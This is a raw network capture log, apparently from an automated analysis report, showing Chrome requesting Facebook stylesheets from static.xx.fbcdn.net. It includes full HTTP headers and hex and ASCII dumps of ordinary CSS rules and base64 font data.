                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:55:00 UTC1928INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: BrVd4eLw7Nr4RL1sdHFCcw==
                                                                                                                                                                                                                                Expires: Sun, 28 Sep 2025 18:03:57 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: fcXbZCHxpDtR/VFKLsGRVpScsX+Gqx+OlLxx6fuQ3xNIYbplmqti4YpD6Toyq7dVuQUce1ITCaey6CKndqG+KA==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:55:00 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 21931
                                                                                                                                                                                                                                2024-09-29 04:55:00 UTC1INData Raw: 2e
                                                                                                                                                                                                                                Data Ascii: .
                                                                                                                                                                                                                                2024-09-29 04:55:00 UTC15879INData Raw: 5f 35 5f 6d 79 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 70 78 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 5f 36 38 71 66 3a 62 65 66 6f 72 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 37 33 37 33 37 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6e 74 65 6e 74 3a 27 57 61 69 74 20 54 69 6d 65 27 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 30 20 31 70 78 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 61 6c 6c 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 32 7d 0a 2e 5f 32 38 68 6e 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 5f 34 65 7a 38 7b
                                                                                                                                                                                                                                Data Ascii: _5_my{display:inline-block;min-height:10px;min-width:10px;width:100%}._68qf:before{background:#373737;color:#fff;content:'Wait Time';font-size:8px;padding:0 1px;pointer-events:all;position:absolute;z-index:2}._28hn{display:inline-block;width:100%}._4ez8{
                                                                                                                                                                                                                                2024-09-29 04:55:00 UTC6051INData Raw: 75 69 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 42 65 6c 6f 77 43 65 6e 74 65 72 3e 2e 75 69 54 6f 6f 6c 74 69 70 58 20 69 2e 61 72 72 6f 77 7b 6c 65 66 74 3a 35 30 25 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 70 78 7d 2e 75 69 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 4c 65 66 74 3e 2e 75 69 54 6f 6f 6c 74 69 70 58 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 34 70 78 7d 2e 75 69 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 4c 65 66 74 3e 2e 75 69 54 6f 6f 6c 74 69 70 58 20 69 2e 61 72 72 6f 77 7b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 63 6f 6c 6f 72 3a 23 32 38 32 38 32 38 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 30 3b 72 69 67 68 74 3a 30 3b 74 6f 70 3a 31 30 70 78 7d 2e 75 69 43 6f 6e 74 65 78
                                                                                                                                                                                                                                Data Ascii: uiContextualLayerBelowCenter>.uiTooltipX i.arrow{left:50%;margin-left:-4px}.uiContextualLayerLeft>.uiTooltipX{margin-right:1px;padding-right:4px}.uiContextualLayerLeft>.uiTooltipX i.arrow{border-left-color:#282828;border-right:0;right:0;top:10px}.uiContex


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                140192.168.2.450072157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:55:00 UTC604OUTGET /rsrc.php/v3/y0/l/0,cross/o2L07-KO0Bj.css HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1929INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: H2tnmWx0H8BZ6m3eYKkHeg==
                                                                                                                                                                                                                                Expires: Mon, 29 Sep 2025 04:55:01 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: j4W6jQOF7rilpoB9UjKsQ/xLiQWnDOgg/jJS4FCLFARbfeAwgHuiKk8XjpYgAoY2lXwL7jbbZ0LrAAen6r0oQg==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:55:01 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=112, ullat=1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 47151
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1500INData Raw: 2e 5f 35 31 6f 37 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 5f 35 31 6f 36 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 0a 2e 5f 31 76 6f 72 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 5f 31 76 6f 72 2b 2e 5f 31 76 6f 72 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 32 70 78 7d 2e 5f 33 77 65 66 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 7d 2e 5f 33 77 65 65 7b 66 6c 6f 61 74 3a 72 69 67 68 74 7d 2e 5f 33 77 65 67 7b 63 6f 6c 6f 72 3a 23 30 34 35 34 61 33 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 0a 2e 5f 32 6b 64 66 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 65 78 74 2d 62 6f 74 74 6f 6d 7d 0a 2e 5f 33 68 79 69 20 2e 5f 35 33 69 6a 7b 62
                                                                                                                                                                                                                                Data Ascii: ._51o7{display:block}._51o6{vertical-align:middle}._1vor{margin:0;padding:0}._1vor+._1vor{padding-top:12px}._3wef{outline:none}._3wee{float:right}._3weg{color:#0454a3;cursor:pointer}._2kdf{display:inline-block;vertical-align:text-bottom}._3hyi ._53ij{b
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1500INData Raw: 7a 2d 2e 70 6e 67 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 61 75 74 6f 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 36 35 70 78 20 2d 34 39 70 78 7d 2e 5f 33 68 79 69 20 2e 5f 35 33 69 6b 20 2e 5f 35 33 69 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 30 2f 72 2f 68 34 52 4d 6f 6d 6f 56 5f 75 68 2e 70 6e 67 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 61 75 74 6f 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 31 35 36 70 78 7d 2e 5f 6e 32 63 20 2e 5f 35 33 69
                                                                                                                                                                                                                                Data Ascii: z-.png);background-repeat:no-repeat;background-size:auto;background-position:-65px -49px}._3hyi ._53ik ._53io{background-image:url(/rsrc.php/v3/y0/r/h4RMomoV_uh.png);background-repeat:no-repeat;background-size:auto;background-position:0 -156px}._n2c ._53i
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1500INData Raw: 63 31 65 32 31 7d 2e 5f 6f 77 79 20 2e 5f 6f 78 62 20 2e 5f 6f 78 63 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 5f 6f 78 36 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 62 65 64 66 30 7d 2e 5f 6f 78 38 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 20 30 20 30 20 33 70 78 7d 2e 5f 37 35 70 5f 20 2e 5f 6f 78 38 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 36 70 78 20 30 20 30 20 36 70 78 7d 2e 5f 6f 78 61 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 20 33 70 78 20 33 70 78 20 30 7d 2e 5f 37 35 70 5f 20 2e 5f 6f 78 61 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 20 36 70 78 20 36 70 78 20 30 7d 2e 5f 6f 78 39 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 7d 2e 5f 37 35 70 5f 20 2e 5f 6f 78 39 7b 62 6f 72 64 65 72
                                                                                                                                                                                                                                Data Ascii: c1e21}._owy ._oxb ._oxc{cursor:pointer}._ox6{background-color:#ebedf0}._ox8{border-radius:3px 0 0 3px}._75p_ ._ox8{border-radius:6px 0 0 6px}._oxa{border-radius:0 3px 3px 0}._75p_ ._oxa{border-radius:0 6px 6px 0}._ox9{border-radius:3px}._75p_ ._ox9{border
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1500INData Raw: 73 6d 6f 7b 77 69 64 74 68 3a 31 30 30 25 7d 62 6f 64 79 5b 64 69 72 3d 27 72 74 6c 27 5d 20 2e 5f 6e 71 67 20 69 6e 70 75 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 2e 5f 6e 71 67 20 69 6e 70 75 74 3a 3a 2d 6d 73 2d 63 6c 65 61 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 5f 34 76 62 69 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 77 69 64 74 68 3a 32 30 70 78 7d 2e 5f 34 76 62 71 20 2e 5f 34 76 62 69 7b 77 69 64 74 68 3a 34 70 78 7d 0a 2e 5f 35 63 30 32 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 35 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 34 70 78 20 30 20 72 67
                                                                                                                                                                                                                                Data Ascii: smo{width:100%}body[dir='rtl'] ._nqg input{text-align:right}._nqg input::-ms-clear{display:none}._4vbi{height:100%;left:0;position:absolute;top:0;width:20px}._4vbq ._4vbi{width:4px}._5c02{border:1px solid #ccd0d5;border-radius:3px;box-shadow:0 0 4px 0 rg
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1500INData Raw: 41 42 42 6e 62 48 6c 6d 41 41 41 42 78 41 41 41 52 68 51 41 41 45 59 55 61 77 57 55 6e 6d 68 6c 59 57 51 41 41 45 66 59 41 41 41 41 4e 67 41 41 41 44 59 4b 62 63 41 78 61 47 68 6c 59 51 41 41 53 42 41 41 41 41 41 6b 41 41 41 41 4a 41 64 47 42 43 35 6f 62 58 52 34 41 41 42 49 4e 41 41 41 41 62 51 41 41 41 47 30 71 67 42 4e 53 32 78 76 59 32 45 41 41 45 6e 6f 41 41 41 41 33 41 41 41 41 4e 78 41 51 31 41 6b 62 57 46 34 63 41 41 41 53 73 51 41 41 41 41 67 41 41 41 41 49 41 42 39 41 57 35 75 59 57 31 6c 41 41 42 4b 35 41 41 41 41 59 59 41 41 41 47 47 6d 55 6f 4a 2b 33 42 76 63 33 51 41 41 45 78 73 41 41 41 41 49 41 41 41 41 43 41 41 41 77 41 41 41 41 4d 44 2b 77 47 51 41 41 55 41 41 41 4b 5a 41 73 77 41 41 41 43 50 41 70 6b 43 7a 41 41 41 41 65 73 41 4d 77 45
                                                                                                                                                                                                                                Data Ascii: ABBnbHlmAAABxAAARhQAAEYUawWUnmhlYWQAAEfYAAAANgAAADYKbcAxaGhlYQAASBAAAAAkAAAAJAdGBC5obXR4AABINAAAAbQAAAG0qgBNS2xvY2EAAEnoAAAA3AAAANxAQ1AkbWF4cAAASsQAAAAgAAAAIAB9AW5uYW1lAABK5AAAAYYAAAGGmUoJ+3Bvc3QAAExsAAAAIAAAACAAAwAAAAMD+wGQAAUAAAKZAswAAACPApkCzAAAAesAMwE
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1500INData Raw: 45 78 77 63 45 77 4d 58 2f 5a 34 42 33 59 55 33 54 6c 2b 46 2f 6d 38 43 46 76 32 65 41 68 59 6d 2f 5a 35 4d 4a 67 45 4d 56 41 46 59 41 51 45 6c 41 54 53 63 72 61 67 63 45 78 51 63 48 42 51 54 48 41 41 43 41 4b 51 41 70 77 4e 59 41 74 6f 41 49 67 41 70 41 41 41 42 46 52 51 47 49 79 45 69 4a 6a 55 52 4e 44 59 7a 49 54 49 57 46 7a 63 75 41 53 4d 68 49 67 59 56 45 52 51 57 4d 79 45 79 4e 6a 30 42 42 78 4d 6e 41 53 63 48 46 7a 63 43 71 51 38 4c 2f 6c 77 4b 45 42 41 4b 41 61 51 46 43 51 51 73 42 51 73 47 2f 67 77 4e 45 68 49 4e 41 66 51 4e 45 69 32 76 54 50 37 50 6d 55 7a 6c 54 41 47 44 6c 41 73 51 45 41 73 42 6f 77 73 50 42 41 4d 73 42 41 55 54 44 66 34 4d 44 52 49 53 44 65 73 75 41 51 52 51 2f 72 36 68 55 66 46 51 41 41 41 44 41 4b 6b 41 6c 67 4e 58 41 75 34
                                                                                                                                                                                                                                Data Ascii: ExwcEwMX/Z4B3YU3Tl+F/m8CFv2eAhYm/Z5MJgEMVAFYAQElATScragcExQcHBQTHAACAKQApwNYAtoAIgApAAABFRQGIyEiJjURNDYzITIWFzcuASMhIgYVERQWMyEyNj0BBxMnAScHFzcCqQ8L/lwKEBAKAaQFCQQsBQsG/gwNEhINAfQNEi2vTP7PmUzlTAGDlAsQEAsBowsPBAMsBAUTDf4MDRISDesuAQRQ/r6hUfFQAAADAKkAlgNXAu4
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1500INData Raw: 47 78 4e 63 58 42 4d 62 47 78 4e 63 47 78 50 39 71 78 51 62 47 78 51 43 56 52 4d 62 41 41 41 41 41 41 51 41 71 51 43 48 41 31 73 43 2f 51 41 45 41 48 77 41 31 67 44 6f 41 41 41 54 4e 53 45 56 49 51 45 4f 41 51 63 4f 41 51 63 4f 41 53 4d 69 4a 69 63 75 41 53 63 75 41 53 63 75 41 54 55 7a 46 42 59 58 48 67 45 58 48 67 45 58 48 67 45 7a 4d 6a 59 33 50 67 45 31 4e 43 59 6e 4c 67 45 6e 4c 67 45 6a 49 69 59 6a 4e 52 59 79 4e 7a 49 32 4e 7a 34 42 4e 7a 34 42 4e 54 51 6d 4a 79 34 42 49 79 49 47 42 77 34 42 46 53 4d 2b 41 54 63 2b 41 54 63 2b 41 54 63 2b 41 54 4d 79 46 68 63 65 41 52 63 65 41 52 63 65 41 52 55 55 42 67 63 4f 41 51 63 78 48 67 45 58 48 67 45 56 46 41 59 48 4d 51 63 6a 4e 44 59 33 50 67 45 33 50 67 45 33 50 67 45 33 50 67 45 33 50 67 45 33 50 67 45
                                                                                                                                                                                                                                Data Ascii: GxNcXBMbGxNcGxP9qxQbGxQCVRMbAAAAAAQAqQCHA1sC/QAEAHwA1gDoAAATNSEVIQEOAQcOAQcOASMiJicuAScuAScuATUzFBYXHgEXHgEXHgEzMjY3PgE1NCYnLgEnLgEjIiYjNRYyNzI2Nz4BNz4BNTQmJy4BIyIGBw4BFSM+ATc+ATc+ATc+ATMyFhceARceARceARUUBgcOAQcxHgEXHgEVFAYHMQcjNDY3PgE3PgE3PgE3PgE3PgE3PgE
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1500INData Raw: 56 6a 4c 2b 30 78 42 4c 41 51 34 44 4b 6b 64 67 41 75 45 78 56 58 4e 43 51 58 4e 56 4d 6a 56 61 64 30 45 43 41 53 30 32 2f 74 6b 35 5a 31 41 79 41 41 41 41 41 41 45 41 71 51 43 34 41 31 63 43 78 51 41 46 41 41 41 6c 4a 7a 63 58 41 52 63 42 70 2f 35 67 6e 67 46 61 56 72 6a 38 57 71 51 42 57 32 45 41 41 41 45 41 79 77 45 6b 41 7a 49 43 61 51 41 4d 41 41 41 42 46 6a 49 33 41 54 59 6d 49 79 45 69 42 68 63 42 41 65 4d 4c 49 51 77 42 46 77 77 49 45 50 32 79 45 51 63 4c 41 52 67 42 4a 41 77 4d 41 53 63 4d 45 68 49 4d 2f 74 6b 41 41 51 46 6a 41 49 34 43 71 41 4c 31 41 41 77 41 41 41 45 47 46 42 63 42 46 6a 59 31 45 54 51 6d 42 77 45 42 59 77 77 4d 41 53 63 4e 45 52 45 4e 2f 74 6b 42 33 51 73 68 44 50 37 70 44 41 67 51 41 6b 34 52 42 77 76 2b 36 41 41 42 41 56 63
                                                                                                                                                                                                                                Data Ascii: VjL+0xBLAQ4DKkdgAuExVXNCQXNVMjVad0ECAS02/tk5Z1AyAAAAAAEAqQC4A1cCxQAFAAAlJzcXARcBp/5gngFaVrj8WqQBW2EAAAEAywEkAzICaQAMAAABFjI3ATYmIyEiBhcBAeMLIQwBFwwIEP2yEQcLARgBJAwMAScMEhIM/tkAAQFjAI4CqAL1AAwAAAEGFBcBFjY1ETQmBwEBYwwMAScNEREN/tkB3QshDP7pDAgQAk4RBwv+6AABAVc
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1500INData Raw: 4a 68 70 43 47 69 59 44 49 66 37 32 68 53 59 31 4e 53 59 6c 4e 6a 59 6c 41 66 55 6e 42 43 73 67 49 43 5a 50 4f 54 68 51 4a 78 38 66 4c 41 51 4e 44 67 51 73 48 78 38 6e 55 44 67 34 55 43 63 66 48 79 77 45 4a 77 4b 74 6c 77 45 59 47 69 49 69 47 76 37 6f 41 6b 34 32 4a 53 59 31 4e 53 59 6c 4e 76 32 79 41 52 67 61 49 69 49 61 2f 75 67 43 54 6a 59 6c 4a 6a 55 31 4a 69 55 32 2f 59 55 42 53 79 49 79 43 68 49 2f 4a 6a 68 51 55 44 67 6d 50 78 49 4b 4d 69 4a 79 63 69 49 79 43 68 49 2f 4a 6a 68 51 55 44 67 6d 50 78 49 4b 4d 69 4c 2b 74 51 41 41 44 77 43 70 41 47 6b 44 56 77 4d 58 41 41 4d 41 42 77 41 4c 41 41 38 41 45 77 41 58 41 42 73 41 48 77 41 6a 41 43 63 41 4b 77 41 76 41 44 4d 41 4e 77 41 38 41 41 41 6c 4d 7a 55 6a 42 7a 4d 31 49 77 63 7a 4e 53 4d 48 4d 7a 55
                                                                                                                                                                                                                                Data Ascii: JhpCGiYDIf72hSY1NSYlNjYlAfUnBCsgICZPOThQJx8fLAQNDgQsHx8nUDg4UCcfHywEJwKtlwEYGiIiGv7oAk42JSY1NSYlNv2yARgaIiIa/ugCTjYlJjU1JiU2/YUBSyIyChI/JjhQUDgmPxIKMiJyciIyChI/JjhQUDgmPxIKMiL+tQAADwCpAGkDVwMXAAMABwALAA8AEwAXABsAHwAjACcAKwAvADMANwA8AAAlMzUjBzM1IwczNSMHMzU
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1500INData Raw: 45 68 49 4e 31 77 77 53 45 67 7a 58 44 52 49 41 41 41 41 43 41 4b 6b 41 5a 41 4e 63 41 78 63 41 42 51 41 4c 41 41 41 42 49 52 45 7a 45 53 45 44 49 52 45 6a 45 53 45 43 64 76 34 7a 75 41 45 56 35 77 48 4e 75 50 37 72 41 78 66 2b 4d 77 45 56 2f 67 55 42 7a 66 37 72 41 41 41 41 41 41 45 41 71 51 44 70 41 31 67 43 6c 77 41 33 41 41 41 42 4c 67 45 6e 4c 67 45 6e 4a 67 59 48 44 67 45 48 44 67 45 48 49 67 59 6a 48 67 45 58 4c 67 4d 6e 50 67 4d 33 48 67 45 58 4d 6a 59 7a 50 67 45 33 4e 68 59 58 48 67 45 58 48 67 45 58 48 67 45 58 4d 43 49 56 41 31 63 46 43 51 55 58 4d 68 77 63 4f 52 30 66 50 52 34 4e 47 67 30 42 41 67 45 51 49 42 41 72 56 46 52 56 4b 68 49 6c 4a 53 51 54 44 52 77 4f 41 51 4d 43 47 54 55 63 4b 45 30 6c 4b 45 59 66 46 53 55 52 41 51 45 42 41 51 47
                                                                                                                                                                                                                                Data Ascii: EhIN1wwSEgzXDRIAAAACAKkAZANcAxcABQALAAABIREzESEDIREjESECdv4zuAEV5wHNuP7rAxf+MwEV/gUBzf7rAAAAAAEAqQDpA1gClwA3AAABLgEnLgEnJgYHDgEHDgEHIgYjHgEXLgMnPgM3HgEXMjYzPgE3NhYXHgEXHgEXHgEXMCIVA1cFCQUXMhwcOR0fPR4NGg0BAgEQIBArVFRVKhIlJSQTDRwOAQMCGTUcKE0lKEYfFSURAQEBAQG


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                141192.168.2.450071157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC604OUTGET /rsrc.php/v3/y6/l/0,cross/WXyn0RO_iMz.css HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1928INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: GA09wh+W7n91afCxNLAPPg==
                                                                                                                                                                                                                                Expires: Mon, 29 Sep 2025 04:55:01 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
